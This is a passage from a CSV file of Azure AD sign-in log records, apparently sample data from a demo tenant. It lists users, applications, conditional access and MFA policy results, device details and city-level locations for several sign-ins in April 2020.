'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,52a6664f-09a1-41b6-959f-775d438c1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1077,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,43:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,321af653-08ac-4a75-a07d-8cf7bf778220,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:43,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",f43e6c92-66fa-4147-92cb-4f3b71bf0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f43e6c92-66fa-4147-92cb-4f3b71bf0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1078,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:19.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d2304196-8cee-42e9-aab1-f1ff71f9a444,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",706e1892-a48a-4a34-be7e-877771bb0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,706e1892-a48a-4a34-be7e-877771bb0d00,SigninLogs,Sucess,50.6406517,5.572050095
+1079,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:48.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:51,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",fb07421f-5305-4d3e-a188-3d0ab96d2e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fb07421f-5305-4d3e-a188-3d0ab96d2e00,SigninLogs,Sucess,32.32146072,34.85319901
+1080,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:47.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,52c87a36-e704-4414-a543-96fd7d0ea47e,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:45,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.471', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",5b465feb-f8b0-465d-b9ef-746b91884000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5b465feb-f8b0-465d-b9ef-746b91884000,SigninLogs,Sucess,35.01296997,-80.93171692
+1081,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,98b329e5-7e1e-41d2-8004-ae47bc5286cb,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",a90d7024-2f24-4b85-b726-7a3061f40c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,a90d7024-2f24-4b85-b726-7a3061f40c00,SigninLogs,Sucess,36.6404686,-78.26995087
+1082,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",37105d23-9607-4aeb-a84b-5fa310f60c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,37105d23-9607-4aeb-a84b-5fa310f60c00,SigninLogs,Sucess,50.6406517,5.572050095
+1083,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:54.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:51,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Chrome 80.0.3987', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",2ce0403b-1665-483a-827f-e759ebf12b00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,2ce0403b-1665-483a-827f-e759ebf12b00,SigninLogs,Sucess,32.32146072,34.85319901
+1084,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:20.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': 